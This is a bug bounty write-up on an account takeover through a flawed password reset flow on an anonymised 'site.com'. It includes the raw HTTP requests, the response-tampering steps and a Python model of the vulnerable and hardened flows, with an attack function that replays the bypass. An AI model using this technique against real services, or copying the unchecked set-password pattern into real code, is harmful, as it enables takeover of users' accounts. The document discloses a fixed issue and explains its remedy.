Account Takeover Via Password Reset Functionality


Hi everyone, here is one of my write-ups on account takeover via password reset functionality. As the site is private, let's assume it is site.com.

So basically, the password reset workflow is as follows:

  • The user requests a password reset
  • A 12-character alphanumeric code is sent to the registered email id
  • The user has to provide the correct code, after which the application asks them to set a new password

So let's start.

To reset a password, the user needs to visit site.com/forgotpassword

The form below will appear:

So here, let's say we use the victim's email id and request a password reset.

After that, the screen below will appear, where we need to enter the correct code to reset the password. The code is 12 characters long, so brute force is not an option.

So here I used a random code like "hacker" and saw that there is no validation of the code length.

Here is the code validation request:
POST /memberp/users/send_reser_instruction
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Requested-With: XMLHttpRequest
Referer: site.com/forgotpassword
Cookie: bla=bla

_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==

Here is the response:

HTTP/1.1 200 OK
Date: Sun, 08 May 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8

The Password reset code entered by you is either invalid or has expired.

After that, I provided the correct code to analyse the back-end validation.

For a correct code, the response body simply changes like this:

HTTP/1.1 200 OK
Date: Sun, 08 May 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-Length: 210


As you can see, the back end only validates the prcemailid2 value, which we can get from the first request. In other words, the set-new-password step is never tied to a successful code check: the only thing the server verifies is a client-supplied value that encodes the email id and is already known from the first request.

_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR

So in the response body you just need to replace it with the code below.

So the final response will look like this:

HTTP/1.1 200 OK
Date: Sun, 08 May 2017 10:58:07 GMT
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-Length: 210


Boom, now the screen below appears.

Now provide the new password and the confirmation and submit the request: the password is changed successfully. Navigate to the login panel and log in with the new password.

Successfully owned the account.
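To show why the tampered response was enough, here is an added example (my own code, not the write-up's or the affected site's) that models the three-step flow above in a vulnerable form and a hardened form. Method names, the in-memory state dictionaries and the reset_proof token are assumptions chosen to mirror the flow; only prcemailid and prcemailid2 are parameter names taken from the page. The attacker path replays what the write-up does: request a reset for the victim, get the "invalid or expired" refusal for a bogus code, ignore it (as the tampered response does client-side) and submit the new password with the prcemailid value from the first request.

```python
"""Model of the three-step reset flow from the write-up, vulnerable and hardened.

Added example; it is not code from the write-up or from the affected site.
Method names, the reset-state dictionaries and the reset_proof token are
assumptions chosen to mirror the flow described above; only prcemailid and
prcemailid2 are parameter names taken from the page.
"""
import base64
import hmac
import secrets
import string
import time

CODE_ALPHABET = string.ascii_uppercase + string.digits
CODE_LEN = 12          # the write-up: 12-character alphanumeric code
TTL_SECONDS = 15 * 60  # assumed code lifetime
INVALID = "The Password reset code entered by you is either invalid or has expired."


def _email_from(prcemailid):
    """prcemailid is assumed to be base64(email); None if it does not decode."""
    try:
        return base64.b64decode(prcemailid, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None


class VulnerableReset:
    """Step 3 trusts prcemailid2 alone: nothing proves that step 2 succeeded,
    so a client that forges the step-2 success page can skip straight to step 3."""

    def __init__(self, accounts):
        self.accounts = accounts   # email -> password
        self.codes = {}            # email -> (code, expiry)

    def send_reset_instruction(self, email):
        code = "".join(secrets.choice(CODE_ALPHABET) for _ in range(CODE_LEN))
        self.codes[email] = (code, time.time() + TTL_SECONDS)   # code goes to the inbox
        return base64.b64encode(email.encode()).decode()        # prcemailid hidden field

    def validate_code(self, prcemailid, code):
        email = _email_from(prcemailid)
        stored = self.codes.get(email)
        if stored is None or time.time() > stored[1] or not hmac.compare_digest(stored[0], code):
            return INVALID
        return {"prcemailid2": prcemailid}   # stands in for the set-password form HTML

    def set_password(self, prcemailid2, new_password, reset_proof=None):
        email = _email_from(prcemailid2)
        if email not in self.accounts:
            return False
        self.accounts[email] = new_password   # BUG: never checks that the code was validated
        return True


class HardenedReset(VulnerableReset):
    """Step 2 issues a one-time server-side proof; step 3 requires it."""

    def __init__(self, accounts):
        super().__init__(accounts)
        self.proofs = {}   # reset_proof -> (email, expiry)

    def validate_code(self, prcemailid, code):
        if len(code) != CODE_LEN or any(c not in CODE_ALPHABET for c in code):
            return INVALID   # reject malformed input such as "hacker" before any lookup
        form = super().validate_code(prcemailid, code)
        if not isinstance(form, dict):
            return form
        email = _email_from(prcemailid)
        del self.codes[email]   # the code is single-use
        proof = secrets.token_urlsafe(32)
        self.proofs[proof] = (email, time.time() + TTL_SECONDS)
        form["reset_proof"] = proof
        return form

    def set_password(self, prcemailid2, new_password, reset_proof=None):
        entry = self.proofs.pop(reset_proof, None)
        if entry is None or time.time() > entry[1] or entry[0] != _email_from(prcemailid2):
            return False   # no proof, expired proof, or proof for a different account
        return super().set_password(prcemailid2, new_password)


def attack(service, victim="victim@site.com"):
    """The write-up's path: request a reset, submit a bogus code, ignore the
    server's refusal (the client-side response was tampered) and jump to step 3."""
    prcemailid = service.send_reset_instruction(victim)
    assert service.validate_code(prcemailid, "hacker") == INVALID
    return service.set_password(prcemailid, "attacker-chosen")


def legitimate(service, email="victim@site.com"):
    """The intended path, with the code read from the inbox (here: from state)."""
    prcemailid = service.send_reset_instruction(email)
    code = service.codes[email][0]
    form = service.validate_code(prcemailid, code)
    return service.set_password(form["prcemailid2"], "user-chosen", form.get("reset_proof"))


if __name__ == "__main__":
    print("vulnerable, attacker:", attack(VulnerableReset({"victim@site.com": "old"})))
    print("hardened, attacker:  ", attack(HardenedReset({"victim@site.com": "old"})))
    print("hardened, legitimate:", legitimate(HardenedReset({"victim@site.com": "old"})))
```

The fix is not client-side validation of the code length (useful, but the attacker controls the client): it is that the set-password request must carry something the server only issues after it has verified the code, bound to the same account and consumed on use. In a real application that proof lives in the session or the database rather than an in-memory dictionary, but the check is the same.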

Status: Fixed
Bounty rewarded

Support Dipak kumar Das by becoming a sponsor. Any amount is appreciated!